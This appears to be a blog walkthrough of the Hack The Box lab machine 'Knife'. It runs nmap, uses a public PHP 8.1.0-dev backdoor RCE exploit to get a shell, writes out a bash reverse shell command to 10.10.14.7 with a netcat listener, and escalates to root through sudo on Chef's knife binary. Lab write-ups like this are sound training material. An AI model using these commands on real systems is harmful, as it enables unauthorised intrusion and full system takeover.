Knife

Enumeration

nmap

We’re going to enumerate all services that are running on the target IP in order to try to understand the system and its purpose.

# nmap -p- -A -v 10.10.10.242 -oA knife

<deleted>
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80 HTTP

We see that the server is running a web service. Upon checking it out, we understand that there is version disclosure vulnerability. Information leaked from headers:

Searchsploit

Looking at the php, apache versions I have discovered that PHP is vulnerable and there is a python script that spawns shell.

# searchsploit -m php/webapps/49933.py 
  Exploit: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
      URL: https://www.exploit-db.com/exploits/49933
     Path: /usr/share/exploitdb/exploits/php/webapps/49933.py
File Type: HTML document, ASCII text, with CRLF line terminators

Copied to: /root/49933.py

Exploit

# python3 49933.py                                                                                         1 ⨯
Enter the full host url:
http://knife.htb

Interactive shell is opened on http://knife.htb 
Can't acces tty; job crontol turned off.
$ whoami
james

$ 

Privilege Escalation

I have discovered that there is a file called knife that is a symbolic link to a ruby script. Googling it shows how we can manipulate the script to change users, run scripts, and generally interesting things. In GTFO bins, I have found that it is possible to run commands too.

$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

$ file /usr/bin/knife                                                                                            
/usr/bin/knife: symbolic link to /opt/chef-workstation/bin/knife                                                 

$ file /opt/chef-workstation/bin/knife                                                                           
/opt/chef-workstation/bin/knife: a /opt/chef-workstation/embedded/bin/ruby --disable-gems script, ASCII text executable

$ sudo /usr/bin/knife exec --help
knife exec [SCRIPT] (options)
    -s, --server-url URL             Chef Infra Server URL.
        --chef-zero-host HOST        Host to start Chef Infra Zero on.
        --chef-zero-port PORT        Port (or port range) to start Chef Infra Zero on. Port ranges like 1000,1010 or 8889-9999 will try all given ports until one works.
    -k, --key KEY                    Chef Infra Server API client key.
        --[no-]color                 Use colored output, defaults to enabled.
    -c, --config CONFIG              The configuration file to use.
        --config-option OPTION=VALUE Override a single configuration option.
        --defaults                   Accept default values for all questions.
    -d, --disable-editing            Do not open EDITOR, just accept the data as is.
    -e, --editor EDITOR              Set the editor to use for interactive commands.
        --environment ENVIRONMENT    Set the Chef Infra Client environment (except for in searches, where this will be flagrantly ignored).
    -E, --exec CODE                  A string of Chef Infra Client code to execute.
        --[no-]fips                  Enable FIPS mode.
    -F, --format FORMAT              Which format to use for output. (valid options: 'summary', 'text', 'json', 'yaml', or 'pp')
        --[no-]listen                Whether a local mode (-z) server binds to a port.
    -z, --local-mode                 Point knife commands at local repository instead of Chef Infra Server.
    -u, --user USER                  Chef Infra Server API client username.
        --print-after                Show the data after a destructive operation.
        --profile PROFILE            The credentials profile to select.
    -p, --script-path PATH:PATH      A colon-separated path to look for scripts in.
    -V, --verbose                    More verbose output. Use twice (-VV) for additional verbosity and three times (-VVV) for maximum verbosity.
    -v, --version                    Show Chef Infra Client version.
    -y, --yes                        Say yes to all prompts for confirmation.
    -h, --help                       Show this help message.

$ sudo knife exec -E 'exec "/bin/sh -i"'
No input file specified.

$ exit

$ ^CExiting...

Tried multiple inputs but I am constantly getting No input file specified. I think it is because of the exploit shell being unstable. Let’s find another one. After googling a bit, I find this one.

# wget https://dl.packetstormsecurity.net/2105-exploits/php_8.1.0-dev.py.txt

# mv php_8.1.0-dev.py.txt php-exploit.py

# cat php-exploit.py
<deleted>
    #Usage: python3 php_8.1.0-dev.py -u http://10.10.10.242/ -c ls
<deleted>

# python3 php-exploit.py -u http://knife.htb -c id
[+] Results:
uid=1000(james) gid=1000(james) groups=1000(james)

# python3 php-exploit.py -u http://knife.htb -c "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.7/1234 0>&1'"

Now that we have reverse shell and we can freely interact, so we can continue on.

# nc -nvlp 1234                                                                
listening on [any] 1234 ...

connect to [10.10.14.7] from (UNKNOWN) [10.10.10.242] 51272
bash: cannot set terminal process group (944): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/$ 
[email protected]:/$ 
[email protected]:/tmp$ sudo /usr/bin/knife exec -E "exec '/bin/sh -i'"
sudo /usr/bin/knife exec -E "exec '/bin/sh -i'"
/bin/sh: 0: can't access tty; job control turned off
# whoami
root

Pretty good. I constantly see version disclosure vulnerabilities out in the wild. People underestimate them and this is a great example why we should not! Enjoy your day! 🙂

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: